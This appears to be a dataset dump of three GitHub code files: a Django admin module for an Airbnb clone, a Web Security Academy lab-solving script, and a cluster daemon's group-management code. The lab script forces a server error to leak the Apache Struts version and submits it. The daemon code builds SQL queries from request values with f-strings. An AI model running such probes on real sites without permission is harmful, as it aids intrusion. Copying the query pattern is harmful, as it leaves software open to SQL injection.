{\"fields\": (\"check_in\", \"check_out\", \"instant_book\",)},),\n (\"Spaces\", {\"fields\": (\"guests\", \"beds\", \"bedrooms\", \"baths\",)}),\n (\n \"More About the Space\",\n {\n \"classes\": (\"collapse\",),\n \"fields\": (\"amenities\", \"facilitys\", \"houserules\",),\n },\n ),\n (\"Last Details\", {\"fields\": (\"host\",)}),\n )\n\n ordering = (\"name\", \"price\", \"bedrooms\")\n\n list_display = (\n \"name\",\n \"country\",\n \"city\",\n \"price\",\n \"guests\",\n \"beds\",\n \"bedrooms\",\n \"baths\",\n \"check_in\",\n \"check_out\",\n \"instant_book\",\n \"count_amenities\",\n \"count_photos\",\n \"total_rating\",\n \"created\",\n )\n\n list_filter = (\n \"instant_book\",\n \"host__superhost\",\n \"room_type\",\n \"amenities\",\n \"facilitys\",\n \"houserules\",\n \"city\",\n \"country\",\n )\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n # ^ , = , @ 설명이 나와있음\n search_fields = (\"^city\", \"^host__username\")\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n # ManyToManyField 에만 적용가능\n filter_horizontal = (\n \"amenities\",\n \"facilitys\",\n \"houserules\",\n )\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.ModelAdmin.raw_id_fields\n raw_id_fields = (\"host\",)\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n\n def save_model(self, request, obj, form, change):\n print(obj, form, change)\n super().save_model(request, obj, form, change)\n\n # obj == row\n def count_amenities(self, obj):\n return obj.amenities.count()\n\n def count_photos(self, obj):\n return obj.photos.count()\n\n def superuser(self, obj):\n return obj.host.superhost\n\n # 해당하는 column name 변경\n # count_amenities.short_description = \"hello sexy!\"\n count_photos.short_description = \"Photo_Count\"\n\n\n@admin.register(models.Photo)\nclass PhotoAdmin(admin.ModelAdmin):\n\n \"\"\" Photo Admin Difinition \"\"\"\n\n list_display = (\"__str__\", \"get_thumnail\")\n\n def get_thumnail(self, obj):\n # print(dir(obj.file))\n\n # mark_safe : django 의 각종 security 때문에 웹사이트가 javascript ,html 등\n # 각종 명령어를 읽지 못하게 막아놓은것을 풀어줌\n # ( django 에게 안전한 String 인것을 알림 )\n return mark_safe(f' ')\n\n get_thumnail.short_description = \"Thumnail\"\n\n", "repo_name": "gygy2006/airbnb-clone", "sub_path": "rooms/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 3663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": 
"django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 121, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 121, "usage_type": "name"}, {"api_name": "django.utils.html.mark_safe", "line_number": 133, "usage_type": "call"}, {"api_name": "django.contrib.admin.register", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 120, "usage_type": "name"}]}
+{"seq_id": "8811037141", "text": "# Information disclosure in error messages\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef get_version(s, url):\n\tprint('\\n[+] Trying to produce an error passing a non-integer value to productId parameter...')\n\tpath = url + '/product?productId=\"gwyo\"'\n\tprint(path)\n\tr = s.get(path)\n\ttime.sleep(1)\n\tprint(r.text)\n\tframework = r.text.encode().split(b'\\n\\n')[1].decode()\n\tprint('\\n[+] Found Framework version:\\t\\t%s' % framework)\n\ttime.sleep(1)\n\tversion = framework.replace('Apache Struts ', '')\n\treturn version\n\ndef submit_version(s, url, version):\n\tprint('[+] Trying to submit the version to solve the lab...')\n\tsubmit_path = url + '/submitSolution'\n\tsubmit_data = {\"answer\": version}\n\tr = s.post(submit_path, data=submit_data)\n\ttime.sleep(1)\n\treturn r\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: Information disclosure in error messages')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif 'Error ' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to retrieve the number version of the framework...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\tversion = get_version(s, url)\n\t\t\tr = submit_version(s, url, version)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' 
in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "gwyomarch/WebSecurityAcademy", "sub_path": "InformationDisclosure/exploit-lab01.py", "file_name": "exploit-lab01.py", "file_ext": "py", "file_size_in_byte": 2644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib3.disable_warnings", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 12, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "requests.Session", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 61, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 64, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}, {"api_name": "urllib.parse.parse.urlparse", "line_number": 68, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 68, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 81, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 85, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 88, "usage_type": "call"}]}
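A sketch of a run of the script above (the lab hostname is hypothetical):

    # $ python3 exploit-lab01.py https://0a1b2c3d.web-security-academy.net
    # get_version() forces an error via /product?productId="gwyo", scrapes the
    # "Apache Struts x.y.z" line out of the verbose stack trace, strips the
    # "Apache Struts " prefix, and submit_version() POSTs it to /submitSolution.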
+{"seq_id": "41494343522", "text": "__author__ = 'Sumit Sharma'\n__copyright__ = 'Copyright 2022, Luna2 Project'\n__license__ = 'GPL'\n__version__ = '2.0'\n__maintainer__ = 'Sumit Sharma'\n__email__ = 'sumit.sharma@clustervision.com'\n__status__ = 'Development'\n\nfrom base64 import b64encode\nfrom concurrent.futures import ThreadPoolExecutor\nfrom utils.database import Database\nfrom utils.log import Log\nfrom utils.config import Config\nfrom utils.queue import Queue\nfrom utils.helper import Helper\nfrom common.constant import CONSTANT\n\n\nclass Group():\n \"\"\"\n This class is responsible for all operations on groups.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n This constructor will initialize all required variables here.\n \"\"\"\n self.logger = Log.get_logger()\n self.plugins_path=CONSTANT[\"PLUGINS\"][\"PLUGINS_DIR\"]\n\n\n def get_all_group(self):\n \"\"\"\n This method will return all the groups in detailed format.\n \"\"\"\n groups = Database().get_record(None, 'group', None)\n if groups:\n response = {'config': {'group': {} }}\n for group in groups:\n name = group['name']\n group_id = group['id']\n group_interface = Database().get_record_join(\n ['groupinterface.interface','network.name as network','groupinterface.options'],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n if group_interface:\n group['interfaces'] = []\n for interface in group_interface:\n interface['options'] = interface['options'] or \"\"\n group['interfaces'].append(interface)\n del group['id']\n group['setupbmc'] = Helper().make_bool(group['setupbmc'])\n group['netboot'] = Helper().make_bool(group['netboot'])\n group['localinstall'] = Helper().make_bool(group['localinstall'])\n group['bootmenu'] = Helper().make_bool(group['bootmenu'])\n group['osimage'] = Database().name_by_id('osimage', group['osimageid'])\n del group['osimageid']\n if group['bmcsetupid']:\n group['bmcsetupname'] = Database().name_by_id('bmcsetup', group['bmcsetupid'])\n del group['bmcsetupid']\n response['config']['group'][name] = group\n self.logger.info('Provided list of all groups with details.')\n else:\n self.logger.error('No group is available.')\n response = 'No group is available'\n return False, response\n return True,response\n\n\n def get_group(self, name=None):\n \"\"\"\n This method will return requested group in detailed format.\n \"\"\"\n # things we have to set for a group\n items = {\n # 'prescript': '',\n # 'partscript': '',\n # 'postscript': '',\n 'setupbmc':False,\n 'netboot':False,\n 'localinstall':False,\n 'bootmenu':False,\n 'provision_interface':'BOOTIF',\n 'provision_method': 'torrent',\n 'provision_fallback': 'http'\n }\n # same as above but now specifically base64\n b64items = {'prescript': '', 'partscript': '', 'postscript': ''}\n cluster = Database().get_record(None, 'cluster', None)\n groups = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if groups:\n response = {'config': {'group': {} }}\n group = groups[0]\n group_id = group['id']\n group_interface = Database().get_record_join(\n [\n 'groupinterface.interface',\n 'network.name as network',\n 'groupinterface.options'\n ],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n if group_interface:\n group['interfaces'] = []\n for interface in group_interface:\n if not interface['options']:\n del interface['options']\n group['interfaces'].append(interface)\n del group['id']\n for key, value in items.items():\n if key in cluster[0] and ((not key in group) or (not group[key])):\n if 
isinstance(value, bool):\n                        cluster[0][key] = str(Helper().make_bool(cluster[0][key]))\n                    group[key] = str(cluster[0][key])\n                    group[key+'_source'] = 'cluster'\n                elif key in group and group[key]:\n                    if isinstance(value, bool):\n                        group[key] = str(Helper().make_bool(group[key]))\n                    group[key+'_source'] = 'group'\n                    group[key] = group[key] or str(value)\n                else:\n                    group[key] = str(value)\n                    group[key+'_source'] = 'default'\n            try:\n                for key, value in b64items.items():\n                    default_str = str(value)\n                    default_data = b64encode(default_str.encode())\n                    default_data = default_data.decode(\"ascii\")\n                    if key in group and group[key]:\n                        group[key] = group[key] or default_data\n                        group[key+'_source'] = 'group'\n                    else:\n                        group[key] = default_data\n                        group[key+'_source'] = 'default'\n            except Exception as exp:\n                self.logger.error(f\"{exp}\")\n\n            group['osimage'] = Database().name_by_id('osimage', group['osimageid'])\n            del group['osimageid']\n            if group['bmcsetupid']:\n                group['bmcsetupname'] = Database().name_by_id('bmcsetup', group['bmcsetupid'])\n            del group['bmcsetupid']\n            # ---\n            if group['osimagetagid']:\n                group['osimagetag'] = Database().name_by_id('osimagetag', group['osimagetagid']) or 'default'\n            else:\n                group['osimagetag'] = 'default'\n            del group['osimagetagid']\n            group['osimage_source'] = 'group'\n            group['bmcsetupname_source'] = 'group'\n            group['osimagetag_source'] = 'group'\n            if group['osimagetag'] == 'default':\n                group['osimagetag_source'] = 'default'\n            # ---\n            response['config']['group'][name] = group\n            self.logger.info(f'Returned Group {name} with Details.')\n        else:\n            self.logger.error('No group is available.')\n            response = 'No group is available'\n            return False,response\n        return True,response\n\n\n    def get_group_member(self, name=None):\n        \"\"\"\n        This method will return the list of all the member node names for a group.\n        \"\"\"\n        status=False\n        groups = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n        if groups:\n            group = groups[0]\n            groupid = group['id']\n            response = {'config': {'group': {name: {'members': []}} }}\n            node_list = Database().get_record(None, 'node', f' WHERE groupid = \"{groupid}\"')\n            if node_list:\n                nodes = []\n                for node in node_list:\n                    nodes.append(node['name'])\n                response['config']['group'][name]['members'] = nodes\n                self.logger.info(f'Provided all group member nodes {nodes}.')\n                status=True\n            else:\n                self.logger.error(f'Group {name} does not have any member node.')\n                response = f'Group {name} does not have any member node'\n                status=False\n        else:\n            self.logger.error(f'Group {name} is not available.')\n            response = f'Group {name} is not available'\n            status=False\n        return status, response\n\n\n    def update_group(self, name=None, request_data=None):\n        \"\"\"\n        This method will create or update a group.\n        \"\"\"\n        data = {}\n        status=False\n        response=\"Internal error\"\n        # things we have to set for a group\n        items = {\n            'prescript': '',\n            'partscript': 'bW91bnQgLXQgdG1wZnMgdG1wZnMgL3N5c3Jvb3QK',\n            'postscript': 'ZWNobyAndG1wZnMgLyB0bXBmcyBkZWZhdWx0cyAwIDAnID4+IC9zeXNyb290L2V0Yy9mc3RhYgo=',\n            'setupbmc': False,\n            'netboot': True,\n            'localinstall': False,\n            'bootmenu': False,\n            'provision_interface': 'BOOTIF'\n        }\n        create, update = False, False\n        if request_data:\n            data = request_data['config']['group'][name]\n            oldgroupname = None\n            group = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n            if group:\n                group_id = group[0]['id']\n                if 'newgroupname' in data:\n                    newgroupname = data['newgroupname']\n                    oldgroupname = name\n                    where = f' WHERE `name` = 
\"{newgroupname}\"'\n check_group = Database().get_record(None, 'group', where)\n if check_group:\n status=False\n return status, f'{newgroupname} Already present in database'\n else:\n data['name'] = data['newgroupname']\n del data['newgroupname']\n update = True\n else:\n if 'newgroupname' in data:\n status=False\n return status, 'Invalid request: newgroupname is not allowed while creating a new group'\n if 'interfaces' not in data:\n controller = Database().get_record_join(\n ['network.name as network'],\n ['ipaddress.tablerefid=controller.id','network.id=ipaddress.networkid'],\n ['tableref=\"controller\"', 'controller.hostname=\"controller\"']\n )\n data['interfaces']=[]\n if controller:\n data['interfaces'].append(\n {\n 'interface': 'BOOTIF',\n 'network': controller[0]['network']\n })\n create = True\n\n # we reset to make sure we don't assing something that won't work\n if 'osimage' in data:\n data['osimagetagid'] = \"default\"\n\n for key, value in items.items():\n if key in data:\n data[key] = data[key]\n if isinstance(value, bool):\n data[key] = str(Helper().bool_to_string(data[key]))\n elif create:\n data[key] = value\n if isinstance(value, bool):\n data[key] = str(Helper().bool_to_string(data[key]))\n if key in data and (not data[key]) and (key not in items):\n del data[key]\n\n if 'bmcsetupname' in data:\n bmcsetupname = data['bmcsetupname']\n data['bmcsetupid'] = Database().id_by_name('bmcsetup', data['bmcsetupname'])\n if data['bmcsetupid']:\n del data['bmcsetupname']\n else:\n status=False\n return status, f'BMC Setup {bmcsetupname} does not exist'\n if 'osimage' in data:\n osimage = data['osimage']\n data['osimageid'] = Database().id_by_name('osimage', osimage)\n if data['osimageid']:\n del data['osimage']\n else:\n status=False\n return status, f'OSimage {osimage} does not exist'\n\n new_interface = None\n if 'interfaces' in data:\n new_interface = data['interfaces']\n del data['interfaces']\n\n if 'osimagetag' in data:\n osimagetag = data['osimagetag']\n del data['osimagetag']\n if osimagetag == \"\":\n data['osimagetagid'] = \"\"\n else:\n osimagetagids = None\n if 'osimageid' in data:\n osimagetagids = Database().get_record(None, 'osimagetag', f\" WHERE osimageid = '{data['osimageid']}' AND name = '{osimagetag}'\")\n elif group and 'osimageid' in group[0]:\n osimagetagids = Database().get_record(None, 'osimagetag', f\" WHERE osimageid = '{group[0]['osimageid']}' AND name = '{osimagetag}'\")\n if osimagetagids:\n data['osimagetagid'] = osimagetagids[0]['id']\n else:\n status = False\n return status, 'Unknown tag, or osimage and tag not related'\n\n group_columns = Database().get_columns('group')\n column_check = Helper().compare_list(data, group_columns)\n if column_check:\n if update:\n where = [{\"column\": \"id\", \"value\": group_id}]\n row = Helper().make_rows(data)\n Database().update('group', row, where)\n response = f'Group {name} updated successfully'\n status=True\n if create:\n data['name'] = name\n row = Helper().make_rows(data)\n group_id = Database().insert('group', row)\n response = f'Group {name} created successfully'\n status=True\n if new_interface:\n for ifx in new_interface:\n if not 'interface' in ifx:\n status=False\n return status, 'Interface name is required for this operation'\n interface_name = ifx['interface']\n network = None\n if not 'network' in ifx:\n nwk=Database().get_record_join(\n ['network.name as network', 'network.id as networkid'],\n [\n 'network.id=groupinterface.networkid',\n 'groupinterface.groupid=group.id'\n ],\n [\n 
f\"`group`.name='{name}'\",\n f\"groupinterface.interface='{interface_name}'\"\n ]\n )\n if nwk and 'networkid' in nwk[0]:\n network=nwk[0]['networkid']\n else:\n network = Database().id_by_name('network', ifx['network'])\n del ifx['network']\n if network is None:\n status=False\n return status, 'Network not provided or does not exist'\n else:\n ifx['networkid'] = network\n ifx['groupid'] = group_id\n group_clause = f'groupid = \"{group_id}\"'\n # network_clause = f'networkid = \"{network}\"'\n interface_clause = f'interface = \"{interface_name}\"'\n where = f' WHERE {group_clause} AND {interface_clause}'\n # where += f' AND {interface_clause}'\n check_interface = Database().get_record(None, 'groupinterface', where)\n result, queue_id = None, None\n if not check_interface:\n row = Helper().make_rows(ifx)\n result = Database().insert('groupinterface', row)\n self.logger.info(f'Interface created => {result} .')\n queue_id, _ = Queue().add_task_to_queue(\n f'add_interface_to_group_nodes:{name}:{interface_name}',\n 'group_interface'\n )\n else: # we update only\n row = Helper().make_rows(ifx)\n where = [\n {\"column\": \"groupid\", \"value\": group_id},\n {\"column\": \"interface\", \"value\": interface_name}\n ]\n result = Database().update('groupinterface', row, where)\n self.logger.info(f'Interface updated => {result} .')\n queue_id, _ = Queue().add_task_to_queue(\n f'update_interface_for_group_nodes:{name}:{interface_name}',\n 'group_interface'\n )\n # below section takes care(in the background) the adding/renaming/deleting.\n # for adding next free ip-s will be selected. time consuming there for\n # background\n if result:\n next_id = Queue().next_task_in_queue('group_interface')\n if queue_id == next_id:\n executor = ThreadPoolExecutor(max_workers=1)\n executor.submit(Config().update_interface_on_group_nodes,name)\n executor.shutdown(wait=False)\n # Config().update_interface_on_group_nodes(name)\n\n # ---- we call the group plugin - maybe someone wants to run something after create/update?\n nodes_in_group = []\n group_details=Database().get_record_join(['node.name AS nodename'],['node.groupid=group.id'],[f\"`group`.name='{name}'\"])\n if group_details:\n for group_detail in group_details:\n nodes_in_group.append(group_detail['nodename'])\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n if oldgroupname and newgroupname:\n group_plugin().rename(name=oldgroupname, newname=newgroupname)\n elif create:\n group_plugin().postcreate(name=name, nodes=nodes_in_group)\n elif update:\n group_plugin().postupdate(name=name, nodes=nodes_in_group)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n\n else:\n status=False\n response = 'Invalid request: Columns are incorrect'\n else:\n status=False\n response = 'Invalid request: Did not receive data'\n return status, response\n\n\n def clone_group(self, name=None, request_data=None):\n \"\"\"\n This method will clone a group.\n \"\"\"\n data = {}\n status=False\n response=\"Internal error\"\n # things we have to set for a group\n items = {\n 'prescript': '',\n 'partscript': '',\n 'postscript': '',\n 'setupbmc': False,\n 'netboot': True,\n 'localinstall': False,\n 'bootmenu': False,\n }\n if request_data:\n newgroupname = None\n data = request_data['config']['group'][name]\n grp = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if grp:\n group_id = grp[0]['id']\n if 'newgroupname' in data:\n newgroupname = data['newgroupname']\n 
where = f' WHERE `name` = \"{newgroupname}\"'\n                    check_group = Database().get_record(None, 'group', where)\n                    if check_group:\n                        status=False\n                        return status, f'{newgroupname} already present in database'\n                    data['name'] = data['newgroupname']\n                    del data['newgroupname']\n                else:\n                    status=False\n                    return status, 'Destination group name not supplied'\n            else:\n                status=False\n                return status, f'Source group {name} does not exist'\n\n            del grp[0]['id']\n            for item in grp[0]:\n                if item in data:\n                    data[item] = data[item]\n                    if item in items and isinstance(items[item], bool):\n                        data[item]=str(Helper().bool_to_string(data[item]))\n                else:\n                    data[item] = grp[0][item]\n                    if item in items and isinstance(items[item], bool):\n                        data[item]=str(Helper().bool_to_string(data[item]))\n                if item in items:\n                    data[item] = data[item] or items[item]\n                    if item in items and isinstance(items[item], bool):\n                        data[item]=str(Helper().bool_to_string(data[item]))\n                if (not data[item]) and (item not in items):\n                    del data[item]\n            if 'bmcsetupname' in data:\n                bmcsetupname = data['bmcsetupname']\n                data['bmcsetupid'] = Database().id_by_name('bmcsetup', data['bmcsetupname'])\n                if data['bmcsetupid']:\n                    del data['bmcsetupname']\n                else:\n                    status=False\n                    return status, f'BMC Setup {bmcsetupname} does not exist'\n            if 'osimage' in data:\n                osimage = data['osimage']\n                del data['osimage']\n                data['osimageid'] = Database().id_by_name('osimage', osimage)\n            new_interface = None\n            if 'interfaces' in data:\n                new_interface = data['interfaces']\n                del data['interfaces']\n            group_columns = Database().get_columns('group')\n            column_check = Helper().compare_list(data, group_columns)\n            if column_check:\n                row = Helper().make_rows(data)\n                new_group_id = Database().insert('group', row)\n                if not new_group_id:\n                    status=False\n                    return status, f'Group {newgroupname} was not created due to possible property clash'\n                # response = f'Group {name} created successfully'\n                response = f'Group {name} cloned as {newgroupname} successfully'\n                status=True\n                group_interfaces = Database().get_record_join(\n                    [\n                        'groupinterface.interface',\n                        'network.name as network',\n                        'network.id as networkid',\n                        'groupinterface.options'\n                    ],\n                    ['network.id=groupinterface.networkid'],\n                    [f\"groupid = '{group_id}'\"]\n                )\n\n                # ------ secrets ------\n                secrets = Database().get_record(None, 'groupsecrets', f' WHERE groupid = \"{group_id}\"')\n                for secret in secrets:\n                    del secret['id']\n                    secret['groupid'] = new_group_id\n                    row = Helper().make_rows(secret)\n                    result = Database().insert('groupsecrets', row)\n                    if not result:\n                        self.delete_group(new_group_id)\n                        status=False\n                        return status, f'Secrets copy for {newgroupname} failed'\n\n                # ------ interfaces -------\n                if new_interface:\n                    for ifx in new_interface:\n                        interface_name = ifx['interface']\n                        index = 0\n                        for grp_ifx in group_interfaces:\n                            # delete interfaces we already have\n                            if interface_name == grp_ifx['interface']:\n                                del group_interfaces[index]\n                            index += 1\n                    for ifx in new_interface:\n                        interface_name = ifx['interface']\n                        if 'network' not in ifx:\n                            status=False\n                            response=f'Network not specified for interface {interface_name}'\n                            break\n                        network = Database().id_by_name('network', ifx['network'])\n                        if network is None:\n                            status=False\n                            response=f\"Network {ifx['network']} does not exist\"\n                            break\n                        else:\n                            ifx['networkid'] = network\n                            if 'options' in ifx:\n                                ifx['options'] = ifx['options'] or \"\"\n                            ifx['groupid'] = new_group_id\n                            del ifx['network']\n                            row = Helper().make_rows(ifx)\n                            Database().insert('groupinterface', row)\n\n                if status is False:\n                    # rollback\n                    
self.delete_group(new_group_id)\n return status, response\n\n for ifx in group_interfaces:\n ifx['groupid'] = new_group_id\n del ifx['network']\n row = Helper().make_rows(ifx)\n Database().insert('groupinterface', row)\n\n # ---- we call the group plugin - maybe someone wants to run something after clone?\n nodes_in_group = []\n group_details=Database().get_record_join(['node.name AS nodename'],['node.groupid=group.id'],[f\"`group`.name='{newgroupname}'\"])\n if group_details:\n for group_detail in group_details:\n nodes_in_group.append(group_detail['nodename'])\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n group_plugin().postcreate(name=newgroupname, nodes=nodes_in_group)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n else:\n response = 'Invalid request: Columns are incorrect'\n status=False\n else:\n response = 'Invalid request: Did not receive data'\n status=False\n return status, response\n\n\n def delete_group_by_name(self, name=None):\n \"\"\"\n This method will delete a group by name.\n \"\"\"\n status=False\n response=f'Group {name} not present in database'\n where = f' WHERE `name` = \"{name}\"'\n group = Database().get_record(None, 'group', where)\n if group:\n status, response=self.delete_group(group[0]['id'])\n return status, response\n\n\n def delete_group(self, groupid=None):\n \"\"\"\n This method will delete a group.\n \"\"\"\n status=False\n where = f' WHERE `id` = \"{groupid}\"'\n group = Database().get_record(None, 'group', where)\n if group:\n name=group[0]['name']\n where = [{\"column\": \"id\", \"value\": groupid}]\n Database().delete_row('group', where)\n where = [{\"column\": \"groupid\", \"value\": group[0]['id']}]\n Database().delete_row('groupinterface', where)\n Database().delete_row('groupsecrets', where)\n response = f'Group {name} removed'\n status=True\n # ---- we call the group plugin - maybe someone wants to run something after delete?\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n group_plugin().delete(name=name)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n else:\n response = 'Group not present in database'\n status=False\n return status, response\n", "repo_name": "clustervision/luna2-daemon", "sub_path": "daemon/base/group.py", "file_name": "group.py", "file_ext": "py", "file_size_in_byte": 28577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.log.Log.get_logger", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.log.Log", "line_number": 28, "usage_type": "name"}, {"api_name": "common.constant.CONSTANT", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.database.Database", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 53, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 55, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.database.Database", 
"line_number": 90, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 96, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 115, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 120, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 129, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 140, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 143, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 147, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 217, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 224, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 237, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 259, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 263, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 277, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 297, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 299, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 306, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 307, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 311, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 312, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 317, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 318, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 329, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 343, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 356, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 359, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 360, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 362, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 367, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 372, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 374, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 382, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 384, "usage_type": "call"}, {"api_name": "utils.config.Config", 